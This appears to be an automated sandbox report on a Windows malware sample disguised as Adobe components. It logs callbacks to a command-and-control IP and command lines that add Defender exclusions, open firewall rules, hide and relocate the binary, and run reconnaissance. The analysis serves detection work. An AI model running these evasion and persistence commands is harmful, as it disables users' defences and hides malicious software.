Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.112.83.96

Source: acrotray.exe, acrotray.exe, 00000045.00000002.561046573.0000000000401000.00000040.00020000.sdmp

String found in binary or memory: http://185.112.83.96:20000/callbackmheap.freeSpanLocked

Source: unknown

HTTP traffic detected: POST /callback HTTP/1.1Host: 185.112.83.96:20000User-Agent: Go-http-client/1.1Content-Length: 60Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipData Raw: 63 61 6c 6c 62 61 63 6b 3d 48 6b 74 67 59 63 6e 6e 25 32 32 43 66 66 67 66 25 32 32 25 32 46 25 32 32 63 65 74 71 76 74 63 25 37 42 26 72 65 67 69 6e 66 6f 3d 57 75 67 74 4d 4b 56 Data Ascii: callback=HktgYcnn%22Cffgf%22%2F%22cetqvtc%7B&reginfo=WugtMKV

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: conhost.exe	Process created: 43
Source: cmd.exe	Process created: 44

System Summary:

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File created: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File deleted: C:\Windows\acrotray.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File created: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Virustotal: Detection: 20%
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe "C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "ipconfig //flushdns"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig //flushdns
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Windows\acrotray.exe"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Windows\acrotray.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\acrotray.exe "C:\Windows\acrotray.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: unknown	Process created: C:\Windows\acrotray.exe "C:\Windows\acrotray.exe"
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "ipconfig //flushdns"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Windows\acrotray.exe"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver	Jump to behavior
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig //flushdns	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Windows\acrotray.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
